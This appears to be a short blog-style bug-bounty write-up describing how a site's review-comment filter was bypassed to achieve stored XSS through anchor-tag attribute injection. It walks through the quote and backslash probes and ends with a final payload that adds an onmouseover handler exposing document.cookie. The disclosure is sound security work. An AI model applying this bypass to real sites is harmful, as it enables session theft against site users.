Bypassing XSS Filtering at Anchor Tag


Severity: High

Weakness: improper filtering anchor attribute

Complexity: Medium

Step’s to Reproduce:

  1. https://site.com/store/ have store to post their tools. They have option to review the tool by Commenting on it.
  • If we Write a Review Like :
Hey Nice Tool http://test.com
  • Application was Automatically Assigning url to Anchor Tag:
<p>Hey Nice Tool</p><a href=”http://test.com" target=”blank”>http://test.com</a>
  • So I Started Playing with Anchor Tag to Find Something .
  • Trying with double quotation .

— — — — — — — — — — — — — — — — — — — — — — — — — — — — -

http://test.com
  • Response :
<a href=”http://test.com&#34;" target=”blank”>http://test.com</a>

Application is Properly Filtering Double Quote’s.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

  • Trying with single quotation .
http://test.com
  • Response :
<a href=”http://test.com’” target=”blank”>http://test.com</a>
  • They Allowed single quotation .

— — — — — — — — — — — — — — — — — — — — — — — — — — — —

  • After Trying lot of ways to get rid of href.
  • Tried by adding backslash \ with single quotation ‘
http://test.com\’
  • Response :
<a href=”http://site.com\" ‘=”” target=”blank”>http://site.com\'</a>

Response was able to add slash inside href and single quote outside by thinking that there is a extra attribute by single quote ‘ = “ “

https://google.com\'
  • Response:

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Final Payload :

https://google.com\'onmouseover='prompt(document.cookie)'

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Able to get rid of href attribute inside Anchor Tag By Making Application think that there is a new attribute .

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.